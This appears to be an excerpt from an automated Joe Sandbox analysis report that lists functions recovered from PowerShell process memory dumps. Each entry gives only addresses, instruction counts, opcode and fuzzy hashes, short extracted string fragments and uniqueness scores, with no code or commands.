                                                          Function 02C83ABC Relevance: .0, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 218fc8109daba4f6d6b685b2de8b28271d8684c08dabeefd057cfe5ca8fd933d
                                                          • Instruction ID: 7f6b502e2b23981f249ea39bb9aeac82957e9e2a6dce3a7cdbb32f738721c04d
                                                          • Opcode Fuzzy Hash: 218fc8109daba4f6d6b685b2de8b28271d8684c08dabeefd057cfe5ca8fd933d
                                                          • Instruction Fuzzy Hash: D711FB74A01248EFDB05DB98D484EDDFBB2FF88314F28D198E405AB361C771A982CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B6D006 Relevance: .0, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2766820687.0000000002B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2b6d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 96e727ad8b0a369de67f40f2bba61f9cc9d1e48ee9b6585b8b65983a02d8435d
                                                          • Instruction ID: 2cfde06cfc422b589762ba4179319b673b2d77ddaf50ad9fba29cc72f92236aa
                                                          • Opcode Fuzzy Hash: 96e727ad8b0a369de67f40f2bba61f9cc9d1e48ee9b6585b8b65983a02d8435d
                                                          • Instruction Fuzzy Hash: 25015E7250D3C05FD7124B258D98762BFA8EF53624F1984DBE8888F1A7C26D9C45C772
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C83E5B Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2300ba20702905b4b6b0c609fca889376a57838cf03a89cb4378daf561d86dd2
                                                          • Instruction ID: 1c23b6f7ac75afa6ded9a0d7042a92f570b6144d277bb39a2665fda89cc2c7c6
                                                          • Opcode Fuzzy Hash: 2300ba20702905b4b6b0c609fca889376a57838cf03a89cb4378daf561d86dd2
                                                          • Instruction Fuzzy Hash: 87014FB8A006549FCB00DB99D490AEEF771FF8D304B249599D95A97361CB35EC07CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B6D01D Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2766820687.0000000002B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2b6d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 09234cc59a7255e44f26314ce8e2538942f769ffc80a598887701cdf849b8f6e
                                                          • Instruction ID: 649cc2f34d1bf82f6e84fddc952f8d6029c6ad98ba66ea2a8438d8216f4f368f
                                                          • Opcode Fuzzy Hash: 09234cc59a7255e44f26314ce8e2538942f769ffc80a598887701cdf849b8f6e
                                                          • Instruction Fuzzy Hash: 0301F2722043419BEB208A29C988B77BF98DF81374F18C4AAEC480A242C37D9841C6B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C8FAF8 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 166b497dfb84d162bc70a36341b8974efb27cedcbc9745c5e4df980364c96907
                                                          • Instruction ID: 19418058ddfdeecdebe4324c2edf2ca820e3cb24e65fdbfc790cd105d96e2d7c
                                                          • Opcode Fuzzy Hash: 166b497dfb84d162bc70a36341b8974efb27cedcbc9745c5e4df980364c96907
                                                          • Instruction Fuzzy Hash: 42E0223184814AAFCB24AB74E85B0FDBBB0EB00124F80069DC5A2931C4DB25668BCAC2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C8FB08 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 022aeb7e21f9b2acb1d5b570e693a8c73662a4f886f7ccc87ccf32296edbad51
                                                          • Instruction ID: d1afafbeb400bd87a1a621734161ca562306c9fe3096594f2e7cafba00352dbb
                                                          • Opcode Fuzzy Hash: 022aeb7e21f9b2acb1d5b570e693a8c73662a4f886f7ccc87ccf32296edbad51
                                                          • Instruction Fuzzy Hash: 58D017308081099BCB18ABA4E81F4FDBB74BB00201F8040ADD95B622C0AA34AA87CA81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C8FD5A Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bcc83e3fbb99d194871a2c71963aff5c4e4c793be389257d87ab469920d923aa
                                                          • Instruction ID: 07719bc9bb4d71fec9762fbbf154199592d917cc96c6221871c06f399c8303a8
                                                          • Opcode Fuzzy Hash: bcc83e3fbb99d194871a2c71963aff5c4e4c793be389257d87ab469920d923aa
                                                          • Instruction Fuzzy Hash: 05B0123054900887C7149F40F40E4397730E780315F00018DDD0E1A4809A211C51C6C0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 071900CE Relevance: .0, Instructions: 3COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                                                          • Instruction ID: aa7568471c24b642ca0eef57f97030f7351818590365929177f3ff10fe4176df
                                                          • Opcode Fuzzy Hash: a3872a1c74b0822931816057ea2c3c6d78071513bd7cb7adbeb310055a1b6cc1
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 071932E8 Relevance: 15.4, Strings: 12, Instructions: 422COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                          • API String ID: 0-1010287211
                                                          • Opcode ID: ee4754b13769a5932fa1b014c314a464e67062ad85cc28f17f47da5ad4c06dc4
                                                          • Instruction ID: 738dc2816e02cc5f3e87d7df69439dce940b3cc298bf5a0518e6388025ab2538
                                                          • Opcode Fuzzy Hash: ee4754b13769a5932fa1b014c314a464e67062ad85cc28f17f47da5ad4c06dc4
                                                          • Instruction Fuzzy Hash: AAE14DB1B04206DFCF178B79881466ABFB2EF86210F1580BAD451CB2D1DB35D943C7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07197560 Relevance: 11.4, Strings: 9, Instructions: 193COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'eq$845l$845l$tPeq$tPeq$$eq$(kq$(kq$(kq
                                                          • API String ID: 0-3297072039
                                                          • Opcode ID: 829b46b5adfa100df6fb37d160111640b55d1273dde87ab0dd57abb4c9052ef5
                                                          • Instruction ID: e28fdbe982fc429136ae3afbf16b3c412708181a9b418a44bce37954d600cc60
                                                          • Opcode Fuzzy Hash: 829b46b5adfa100df6fb37d160111640b55d1273dde87ab0dd57abb4c9052ef5
                                                          • Instruction Fuzzy Hash: CB61A2B0A20206DBDF298F59C545B6AB7F2AF45710F25847AE8056B2D0C771EC42CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0719B1D2 Relevance: 10.3, Strings: 8, Instructions: 327COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 845l$845l$845l$845l$tPeq$tPeq$tPeq$tPeq
                                                          • API String ID: 0-2071899847
                                                          • Opcode ID: 974cb3da4eb3e96f3fd3b72ea3b486682678cc91601867e04a088e5353c82c7f
                                                          • Instruction ID: 56261c5fdb6b00cb1dfd7d19d45ba0b87631b1e79c233fb399baee19765f0900
                                                          • Opcode Fuzzy Hash: 974cb3da4eb3e96f3fd3b72ea3b486682678cc91601867e04a088e5353c82c7f
                                                          • Instruction Fuzzy Hash: 77C1A0F1A04209DFCF25DF59D444AAABBE2FF89310F658469E8059B381CB31ED42CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07195849 Relevance: 10.2, Strings: 8, Instructions: 169COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'eq$4'eq$tPeq$tPeq$$eq$$eq$$eq$$eq
                                                          • API String ID: 0-723692213
                                                          • Opcode ID: 01061f0e342e86f211965645966eac3251f8febff8091ba8aaeafd95919a0215
                                                          • Instruction ID: 45a7850f38e49de9e096c6918a68aea38552018bfc10ab32620a186a7e5cde79
                                                          • Opcode Fuzzy Hash: 01061f0e342e86f211965645966eac3251f8febff8091ba8aaeafd95919a0215
                                                          • Instruction Fuzzy Hash: 075105B1B00216DFDF2B8F5584516AABBA3AF85220F14C07AD446AF2C1CB31D962CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07197210 Relevance: 10.2, Strings: 8, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'eq$845l$TQjq$TQjq$tPeq$$eq$$eq$$eq
                                                          • API String ID: 0-3310313400
                                                          • Opcode ID: 36a07e4c522e3891a412842424765f8edd70340510e8d0c2f2b532b3152dc0c3
                                                          • Instruction ID: 5769db8951b8c1d40de19fc82a911f049ff02cb5dda8ceafec24100b4e675c05
                                                          • Opcode Fuzzy Hash: 36a07e4c522e3891a412842424765f8edd70340510e8d0c2f2b532b3152dc0c3
                                                          • Instruction Fuzzy Hash: CE51A4B1630206DFDF2ACE05C5047AA7BA2FF45711F598079E8059B6D1C731DD82CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07198E50 Relevance: 7.9, Strings: 6, Instructions: 385COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'eq$4'eq$4'eq$4'eq$x.(k$-(k
                                                          • API String ID: 0-22441994
                                                          • Opcode ID: 29bb557aeeec5d803bea0a5bf0706f9584641bcd83df6636edf80ead401c232c
                                                          • Instruction ID: e5e16d697eb13ea9c5a8d31faed5a5a5e64af4801b22c08602a37348441efb08
                                                          • Opcode Fuzzy Hash: 29bb557aeeec5d803bea0a5bf0706f9584641bcd83df6636edf80ead401c232c
                                                          • Instruction Fuzzy Hash: 3BF15F74A002149FCB24DB68D851B9EBBF2FF85305F1085A9D509AB381CB75ED86CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0719800F Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 845l$XRjq$XRjq$tPeq$$eq
                                                          • API String ID: 0-17508257
                                                          • Opcode ID: f3c09156987d458345e3ffd4e1ec9ab55a124e27d54fc7860ad4be5c414818d2
                                                          • Instruction ID: c4d3b2f9a410d732a844a4b66d9aa3c52bf31f11975ccaa3c2b2ce0d2cb29cfb
                                                          • Opcode Fuzzy Hash: f3c09156987d458345e3ffd4e1ec9ab55a124e27d54fc7860ad4be5c414818d2
                                                          • Instruction Fuzzy Hash: 494185B1A00205DFCF258F18C544AAABBF2BF46714F69C1B9D8455B2D1C735DD82CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07192AF8 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $eq$$eq$$eq$-l$-l
                                                          • API String ID: 0-3258709071
                                                          • Opcode ID: 395aa6e642ea088014f3edb367d88190bf25686e06e786041ea1feb686e6e689
                                                          • Instruction ID: c693b599f1c6c9e03d0aeaa662f6064ac3fc26eeebb8f3e4c5e76ed644d4f21a
                                                          • Opcode Fuzzy Hash: 395aa6e642ea088014f3edb367d88190bf25686e06e786041ea1feb686e6e689
                                                          • Instruction Fuzzy Hash: CD1106B130020BABDF255D2AC800727F7D6BBD9720F24803AE84A872D5CB71D5428351
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 071966F8 Relevance: 5.5, Strings: 4, Instructions: 487COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (oeq$(oeq$(oeq$(oeq
                                                          • API String ID: 0-182854655
                                                          • Opcode ID: 804fba9159c633ede3b44e4db8ef770a387abe4daa4a9b2860993dcb109ca541
                                                          • Instruction ID: aef24759655dd951c72908fbac46f8bd6c5a46ca74fd8973112835670929731b
                                                          • Opcode Fuzzy Hash: 804fba9159c633ede3b44e4db8ef770a387abe4daa4a9b2860993dcb109ca541
                                                          • Instruction Fuzzy Hash: C6F1E3B1B04246DFCF168F68C855BAABBE2EF85311F14847AE5058B2D1DB35D842CBB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07198E34 Relevance: 5.4, Strings: 4, Instructions: 363COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'eq$4'eq$x.(k$-(k
                                                          • API String ID: 0-2938298036
                                                          • Opcode ID: f46b8c31ffabb613944c9a0150d1bd0d11f42769bab1e8ad3145fce5ce220450
                                                          • Instruction ID: 9819f75cfbe9a976ec8501735a09f1bf7790fc82624aeb6ac4e80c4a3fd1c138
                                                          • Opcode Fuzzy Hash: f46b8c31ffabb613944c9a0150d1bd0d11f42769bab1e8ad3145fce5ce220450
                                                          • Instruction Fuzzy Hash: DBF16074A002149FCB24DB58D891B9EBBF2BF85304F1081A9D509AF381CB75ED86CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 071943A0 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 845l$845l$tPeq$tPeq
                                                          • API String ID: 0-1655194071
                                                          • Opcode ID: 7da44508f5e67911c7eeed9defbc80b2e665beacbb56c316d9c60011560f4ebf
                                                          • Instruction ID: 73ead410aed81861fa47f6ac3d83326bcc7de342486e92b817bf106db772a9e2
                                                          • Opcode Fuzzy Hash: 7da44508f5e67911c7eeed9defbc80b2e665beacbb56c316d9c60011560f4ebf
                                                          • Instruction Fuzzy Hash: F39149F1700295AFDF269F69C451A6BBBA6AF85310F24847ADD058B3C1DB31D843C7A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0719A130 Relevance: 5.3, Strings: 4, Instructions: 252COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 845l$845l$tPeq$tPeq
                                                          • API String ID: 0-1655194071
                                                          • Opcode ID: 2b7cb93fd4e5e39d7a86a56494c54d2d346ab0d8d52ad527f6aa5f0cea63ea08
                                                          • Instruction ID: b4e52277001dc969a50fdf5b2b4bd85f763a1ff826a812c822e987530d5cc246
                                                          • Opcode Fuzzy Hash: 2b7cb93fd4e5e39d7a86a56494c54d2d346ab0d8d52ad527f6aa5f0cea63ea08
                                                          • Instruction Fuzzy Hash: F481F471B00215CFCF169F69C4046AABBE2EF85320F69C47AD9459B381DB31DD4ACBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 071900F8 Relevance: 5.1, Strings: 4, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 845l$845l$tPeq$tPeq
                                                          • API String ID: 0-1655194071
                                                          • Opcode ID: facde362d9c92e5e84f8780d17b2edecff436890220ca89242908324da0adb47
                                                          • Instruction ID: cc8a8a249f3074f9c415016010547981f55f46adcc06330eef94e22e0e4b6c45
                                                          • Opcode Fuzzy Hash: facde362d9c92e5e84f8780d17b2edecff436890220ca89242908324da0adb47
                                                          • Instruction Fuzzy Hash: 193158B1B05252DFCB524BA8885466ABFB1EF49310F5580AAE940DF2C2D731DC42C7E2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07190ED8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $eq$$eq$$eq$$eq
                                                          • API String ID: 0-812946093
                                                          • Opcode ID: 0e35fc1af23e03b3a1b81e4fc11603e66f545ef0bfb43b56de79ff9d7eb49571
                                                          • Instruction ID: d82e0b1350a2831d5593b8bb74c61b0233ee6703856b94c191d5679978615faa
                                                          • Opcode Fuzzy Hash: 0e35fc1af23e03b3a1b81e4fc11603e66f545ef0bfb43b56de79ff9d7eb49571
                                                          • Instruction Fuzzy Hash: EF2188B231021B9BDF78452A8881727BBD6ABC9710F20843AE509CB3C1EF36D9428761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07191EC3 Relevance: 5.0, Strings: 4, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'eq$4'eq$$eq$$eq
                                                          • API String ID: 0-3287427201
                                                          • Opcode ID: f1c6145b8a1cdc87e3b3a9102756154cd48647b51a0da3419306ef089fe45bca
                                                          • Instruction ID: c8c2fd1c651bae8d937d38272b36dc4a037bbe97ba6a7e78d698da0de09a9ebf
                                                          • Opcode Fuzzy Hash: f1c6145b8a1cdc87e3b3a9102756154cd48647b51a0da3419306ef089fe45bca
                                                          • Instruction Fuzzy Hash: 2EF052B0B1000FE38D3D692C24141BBA7B3EBC1A10725413AD202DB7C8DF348D8757A6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Function 030ED006 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3309211656.00000000030ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 030ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_30ed000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5b6c7c7afb26fe68e39e21180468256c102e7e747a72058f5cd310e11255e6f6
                                                          • Instruction ID: b0fe812ba9f96f5d10455425258bf943938faa83a3b9f6087ae9413b1d43083c
                                                          • Opcode Fuzzy Hash: 5b6c7c7afb26fe68e39e21180468256c102e7e747a72058f5cd310e11255e6f6
                                                          • Instruction Fuzzy Hash: 6B012D6210E3C05FD7128B258994B52BFB4DF53224F1D81CBD9888F1A7C2695844D772
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 030ED01D Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3309211656.00000000030ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 030ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_30ed000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34e5eb2f818eeddce7c9faace1b690762bacf5ede9a8978829327e782ff68bf7
                                                          • Instruction ID: 7bcf8dbb42b40a2ce404d73d54603aad21ca795372b01c6f6f80446697104c17
                                                          • Opcode Fuzzy Hash: 34e5eb2f818eeddce7c9faace1b690762bacf5ede9a8978829327e782ff68bf7
                                                          • Instruction Fuzzy Hash: 8E01F2722063049EE760DA29C984B6AFFD8DF41331F1CC85AED480A282C2799841CAB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%